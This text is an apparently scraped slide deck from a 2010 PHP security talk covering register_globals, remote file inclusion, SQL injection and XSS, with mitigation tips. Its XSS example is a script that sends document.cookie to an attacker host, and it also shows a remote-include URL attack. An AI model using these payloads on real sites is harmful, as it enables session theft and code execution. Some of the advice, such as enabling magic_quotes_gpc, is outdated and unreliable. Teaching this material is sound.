Upload
ssrajsathya
View
785
Download
3
Embed Size (px)
DESCRIPTION
PHP Security Tech Talk
Citation preview
Unit 18-1, 3rd Mile Square, No 151, Jalan Klang Lama,
Batu 3 1/2, 58100 Kuala Lumpur Tel : +603-7981 4422 / +603-7981 2875
Fax : +603-7981 9166
Copyright @ Alsys MSC SDN BHD 2010
Unit 18-1, 3rd Mile Square, No 151, Jalan Klang Lama,
Batu 3 1/2, 58100 Kuala Lumpur Tel : +603-7981 4422 / +603-7981 2875
Fax : +603-7981 9166
Copyright @ Alsys MSC SDN BHD 2010
• Importance of PHP Security
• Concerns of PHP Security
1. Input Validation
2. Register Global
3. Code Injection
4. SQL injection
5. Cross-site Scripting (XSS)
Unit 18-1, 3rd Mile Square, No 151, Jalan Klang Lama,
Batu 3 1/2, 58100 Kuala Lumpur Tel : +603-7981 4422 / +603-7981 2875
Fax : +603-7981 9166
Copyright @ Alsys MSC SDN BHD 2010
• Protect server from crash
• Prevent malicious user have root access
• Protect customer data
Unit 18-1, 3rd Mile Square, No 151, Jalan Klang Lama,
Batu 3 1/2, 58100 Kuala Lumpur Tel : +603-7981 4422 / +603-7981 2875
Fax : +603-7981 9166
Copyright @ Alsys MSC SDN BHD 2010
• All User Inputs are unreliable and can’t be trusted
Solution:
• Need to Validate any user input before use
• Validation on the client side is good for the user
• Validation on the server side is good for security
Unit 18-1, 3rd Mile Square, No 151, Jalan Klang Lama,
Batu 3 1/2, 58100 Kuala Lumpur Tel : +603-7981 4422 / +603-7981 2875
Fax : +603-7981 9166
Copyright @ Alsys MSC SDN BHD 2010
• When “register_globals” is set ON, un-initialized variable can
be injected via user inputs
• Example
<?php
if(authenticate_user()) {
$authenticated = true; }
- - - - -
if($authenticated) {
die(“Authentication required”); }
?>
If set $authenticated to 1 via GET, http://ffs.com/admin.php?authenticated=1
Unit 18-1, 3rd Mile Square, No 151, Jalan Klang Lama,
Batu 3 1/2, 58100 Kuala Lumpur Tel : +603-7981 4422 / +603-7981 2875
Fax : +603-7981 9166
Copyright @ Alsys MSC SDN BHD 2010
• Set “register_globals” Off in php.ini(Disabled by default in
versions >= 4.1.0)
• Alternative to Register Global : SUPER GLOBALS• $_GET – data from get requests
• $_POST – post request data
• $_COOKIES – cookie information
• $_FILES – upload file data
• $_SERVER - server data
• $_ENV – environment variable
• $_REQUEST – mix of GET, POST, COOKIE
Unit 18-1, 3rd Mile Square, No 151, Jalan Klang Lama,
Batu 3 1/2, 58100 Kuala Lumpur Tel : +603-7981 4422 / +603-7981 2875
Fax : +603-7981 9166
Copyright @ Alsys MSC SDN BHD 2010
• Dynamic paths/files used in require/include statements
• Example:<?php
include “{$_GET[‘path’]}/script.php”;
?>
If set $path to “http://www.hackers.com” via GET,
<?php
include “http://www.hackers.com/script.php”;
?>
• Avoid using dynamic paths
• Always use full path, defined by constants
Unit 18-1, 3rd Mile Square, No 151, Jalan Klang Lama,
Batu 3 1/2, 58100 Kuala Lumpur Tel : +603-7981 4422 / +603-7981 2875
Fax : +603-7981 9166
Copyright @ Alsys MSC SDN BHD 2010
• Allow a Malicious SQL code on server
• Allow Malicious user have root access
• Removal of data
• Modification of existing values
• Denial of service
Unit 18-1, 3rd Mile Square, No 151, Jalan Klang Lama,
Batu 3 1/2, 58100 Kuala Lumpur Tel : +603-7981 4422 / +603-7981 2875
Fax : +603-7981 9166
Copyright @ Alsys MSC SDN BHD 2010
• MYSQL Prepared Statement - using mysqli::prepare()
• Validate input data before send to the database
• addslashes(), mysql_real_escape()
• magic_quotes_gpc - Set to ON
• error_reporting - Set to E_ALL
• display_error – Set to ON in development, OFF in production
• log_errors – Set to ON in production
• error_log – Set to the desired location of the error log
Unit 18-1, 3rd Mile Square, No 151, Jalan Klang Lama,
Batu 3 1/2, 58100 Kuala Lumpur Tel : +603-7981 4422 / +603-7981 2875
Fax : +603-7981 9166
Copyright @ Alsys MSC SDN BHD 2010
• Inject HTML/Script in a page, Pass a request to another Site
• Session take-over
• Password theft
• User tracking by 3rd Parties
• Example:
<script>document.location =
"http://cookiehaker.com/xss.php?"+document.cookie</script>
Unit 18-1, 3rd Mile Square, No 151, Jalan Klang Lama,
Batu 3 1/2, 58100 Kuala Lumpur Tel : +603-7981 4422 / +603-7981 2875
Fax : +603-7981 9166
Copyright @ Alsys MSC SDN BHD 2010
• Server Side Validation for all Input Data
• htmlspecialchars() – encodes ‘,”,<,>,&
• htmlentities() – Convert all applicable chars to HTML entities
• strip_tags() – Remove HTML and PHP tags
Unit 18-1, 3rd Mile Square, No 151, Jalan Klang Lama,
Batu 3 1/2, 58100 Kuala Lumpur Tel : +603-7981 4422 / +603-7981 2875
Fax : +603-7981 9166
Copyright @ Alsys MSC SDN BHD 2010
• XSS Me - https://addons.mozilla.org/en-US/firefox/addon/7598/
• Web Developer Tool
• Firefox – https://addons.mozilla.org/en-US/firefox/addon/60/
• IE - http://www.microsoft.com/downloads/details.aspx?
• FamilyID=E59C3964-672D-4511-BB3E-2D5E1DB91038
• Firebug - https://addons.mozilla.org/en-US/firefox/addon/1843/
Unit 18-1, 3rd Mile Square, No 151, Jalan Klang Lama,
Batu 3 1/2, 58100 Kuala Lumpur Tel : +603-7981 4422 / +603-7981 2875
Fax : +603-7981 9166
Copyright @ Alsys MSC SDN BHD 2010
Unit 18-1, 3rd Mile Square, No 151, Jalan Klang Lama,
Batu 3 1/2, 58100 Kuala Lumpur Tel : +603-7981 4422 / +603-7981 2875
Fax : +603-7981 9166
Copyright @ Alsys MSC SDN BHD 2010